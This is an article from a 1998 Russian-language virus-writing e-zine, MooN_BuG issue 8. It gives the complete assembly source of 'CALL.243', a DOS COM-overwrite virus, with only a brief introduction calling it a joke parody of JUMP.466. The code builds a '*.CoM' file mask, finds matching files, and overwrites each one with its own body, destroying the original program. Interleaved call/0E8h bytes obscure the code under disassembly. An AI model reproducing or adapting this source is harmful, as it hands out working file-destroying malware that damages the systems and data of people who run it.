[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 8, Nov 1998                                           file 005

                                Вирус CALL.243
                                                        by RedArc

     Это   обычный   COM-Overwrite   вирус.  Его  можно  считать  пародией  на
классический   вирус  JUMP.466.  В  нем  нет  ничего  интересного,  разве  что
посмотреть на него в HIEW'е... ;)

;Virus-Joke (c) by RedArc
model tiny
.code
.386
org 100h
start:
     call [label0+1]
label0:
     db 0e8h
     mov al,80h
     call [label1+1]
label1:
     db 0e8h
     mov di,ax
     call [label2_0+1]
label2_0:
     db 0e8h
     mov dx,ax
     call [label2+1]
label2:
     db 0e8h
     mov al,'*'
     call [label2_1+1]
label2_1:
     db 0e8h
     stosb
     nop
     call [label2_2_0+1]
label2_2_0:
     db 0e8h
     mov al,'.'
     call [label2_2_1+1]
label2_2_1:
     db 0e8h
     nop
     stosb
     call [label2_2+1]
label2_2:
     db 0e8h
     mov al,'C'
     call [label2_3+1]
label2_3:
     db 0e8h
     stosb
     nop
     call [label2_3_0+1]
label2_3_0:
     db 0e8h
     mov al,'o'
     call [label2_3_1+1]
label2_3_1:
     db 0e8h
     stosb
     nop
     call [label2_4+1]
label2_4:
     db 0e8h
     mov al,'M'
     call [label2_5+1]
label2_5:
     db 0e8h
     nop
     stosb
     call [label2_6+1]
label2_6:
     db 0e8h
     mov al,0
     call [label2_6_0+1]
label2_6_0:
     db 0e8h
     stosb
     nop
     call [label2_7+1]
label2_7:
     db 0e8h
     mov ah,4eh
     call [label3+1]
label3:
     db 0e8h
     mov ch,0
     call [label4+1]
label4:
     db 0e8h
     mov cl,0feh
     call [label5+1]
label5:
     db 0e8h
     mov bh,0ffh
     call [label6+1]
label6:
     db 0e8h
     mov bl,0feh
     call [label7+1]
label7:
     db 0e8h
     mov sp,bx
     call [label8+1]
label8:
     db 0e8h
     int 21h
     call [label9+1]
label9:
     db 0e8h
     jb NotFound
     call [label10+1]
label10:
     db 0e8h
     jmp short TestFile
label10_1:
     db 0e8h
NotFound:
     int 20h
label10_2:
     db 0e8h
TestFile:
     mov sp,bx
     call [label11+1]
label11:
     db 0e8h
     mov ah,3dh
     call [label12+1]
label12:
     db 0e8h
     mov al,02h
     call [label13+1]
label13:
     db 0e8h
     mov dh,0
     call [label14+1]
label14:
     db 0e8h
     mov dl,9eh
     call [label15+1]
label15:
     db 0e8h
     int 21h
     call [label16+1]
label16:
     db 0e8h
     mov bx,ax
     call [label17+1]
label17:
     db 0e8h
     mov ah,40h
     call [label18+1]
label18:
     db 0e8h
     mov dh,1
     call [label19+1]
label19:
     db 0e8h
     mov dl,0
     call [label20+1]
label20:
     db 0e8h
     mov ch,dl
     call [label21+1]
label21:
     db 0e8h
     mov cl,VirLength
     call [label22+1]
label22:
     db 0e8h
     int 21h
     call [label23+1]
label23:
     db 0e8h
     mov ah,3eh
     call [label24+1]
label24:
     db 0e8h
     int 21h
     call [label25+1]
label25:
     db 0e8h
     mov ah,4fh
     call [label5+1]
VirLength equ $-start
end start